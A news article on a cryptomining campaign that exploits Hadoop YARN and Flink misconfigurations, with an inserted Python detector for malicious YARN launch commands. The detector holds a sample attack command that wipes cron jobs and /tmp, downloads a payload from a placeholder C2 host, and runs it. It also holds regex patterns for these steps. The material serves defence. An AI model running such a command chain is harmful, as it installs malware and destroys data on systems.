A threat actor is targeting a common misconfiguration in Hadoop YARN and Apache Flink to drop Monero cryptominers in environments running the two big data technologies.
What makes the campaign especially notable is the adversary's use of sophisticated evasion techniques, such as rootkits, packed ELF binaries, directory content deletion, and system configuration modifications to bypass typical threat detection mechanisms.
Known Misconfigurations

Researchers from Aqua Nautilus uncovered the campaign when they spotted new attacks hitting one of their cloud honeypots recently.
One attack exploited a known misconfiguration in a feature in Hadoop YARN called ResourceManager that manages resources for applications running on a Hadoop cluster.
The other targeted a similarly known misconfiguration in Flink that, like the YARN issue, gives attackers a way to run arbitrary code on affected systems.
Hadoop YARN is a resource management subsystem of the Hadoop ecosystem for big data processing.
Apache Flink is a relatively widely used open source stream and batch processor for event-driven data analytics and data pipeline applications.
Assaf Morag, lead researcher for Aqua Nautilus, says the YARN misconfiguration gives attackers a way to send an unauthenticated API request to create new applications.
The Flink misconfiguration allows an attacker to upload a Java archive (JAR) file that contains malicious code to a Flink server.
Given that these servers are used for data processing, their misconfigurations present a data exfiltration risk.
Deploying a Cryptominer

In the attack on Aqua Nautilus' honeypots, the adversary exploited the misconfiguration in Hadoop YARN to send an unauthenticated request to deploy a new application.
The attacker was then able to execute remote code on the misconfigured YARN server by sending a POST request asking it to launch the new application using the attacker's command.
To establish persistence, the attacker first deleted all cron jobs - or scheduled tasks - on the YARN server and created a new cron job.
Aqua's analysis of the attack chain showed the attacker's command deleting the contents of the /tmp directory on the YARN server, downloading a malicious file into /tmp from a remote command-and-control (C2) server, executing that file, and then deleting the contents of the directory again.
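Defenders can look for this chain in the launch commands submitted to the YARN ResourceManager. The following detector is an added illustration, not code from Aqua or Dark Reading: it scores a launch command against the steps described above (cron job removal, /tmp wipe, download into /tmp, execution, second wipe). The sample commands and the c2.invalid host are constructed, and the exact shell spellings of each step are assumptions about how such a command would look.

```python
import re

# Each indicator mirrors one step of the attack chain described in the article.
# The shell spellings below are assumptions, not quotes from the report.
INDICATORS = {
    "cron_wipe": re.compile(r"\bcrontab\s+-r\b"),
    "tmp_wipe": re.compile(r"\brm\s+-\S*r\S*\s+/tmp/(\*|\.\*)"),
    "download_to_tmp": re.compile(
        r"\b(curl|wget)\b[^;&|]*\s-[oO]\s*/tmp/"      # curl/wget -o /tmp/...
        r"|\bcd\s+/tmp\s*(&&|;)\s*(curl|wget)\b"      # cd /tmp && wget ...
    ),
    "exec_from_tmp": re.compile(
        r"\bchmod\s+\S+\s+/tmp/\S+"                    # chmod +x /tmp/...
        r"|(^|[;&|]\s*)(sh\s+|bash\s+)?/tmp/\S+"       # ; /tmp/x  or  ; sh /tmp/x
    ),
}


def launch_command_indicators(cmd: str) -> list[str]:
    """Return the names of every attack-chain step present in a launch command."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    # The chain wipes /tmp before the download and again after execution.
    if len(INDICATORS["tmp_wipe"].findall(cmd)) >= 2:
        hits.append("tmp_wiped_twice")
    return hits


def is_suspicious(cmd: str, threshold: int = 3) -> bool:
    """Flag a command once it matches at least `threshold` chain steps."""
    return len(launch_command_indicators(cmd)) >= threshold


# Constructed sample launch commands; c2.invalid is a placeholder host.
SAMPLE_LAUNCH_COMMANDS = {
    "malicious": (
        "crontab -r; rm -rf /tmp/*; cd /tmp && wget http://c2.invalid/x -O /tmp/x; "
        "chmod +x /tmp/x; /tmp/x; rm -rf /tmp/*"
    ),
    "benign_spark": "spark-submit --class org.example.Job --master yarn hdfs:///jobs/etl.jar",
    "benign_cleanup": "rm -rf /tmp/*; spark-submit --master yarn hdfs:///jobs/etl.jar",
}

if __name__ == "__main__":
    for label, cmd in SAMPLE_LAUNCH_COMMANDS.items():
        print(label, is_suspicious(cmd), launch_command_indicators(cmd))
```

The threshold keeps a lone /tmp cleanup from alerting on its own; only the combination of steps that the report describes trips the detector.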
Aqua researchers found the secondary payload from the C2 server to be a packed ELF binary that served as a downloader for two different rootkits, one of which was a Monero cryptocurrency miner.
Malware detection engines on VirusTotal did not detect the secondary ELF binary payload, Aqua said.
Morag says the attack is noteworthy for the different techniques the attacker used to conceal their malicious activity.
These included the use of a packer to obfuscate the ELF binary, stripped payloads to make analysis more challenging, a payload embedded within the ELF binary, modifications to file and directory permissions, and two rootkits to hide the cryptominer and its shell commands.
This Cyber News was published on www.darkreading.com. Publication date: Wed, 10 Jan 2024 23:20:04 +0000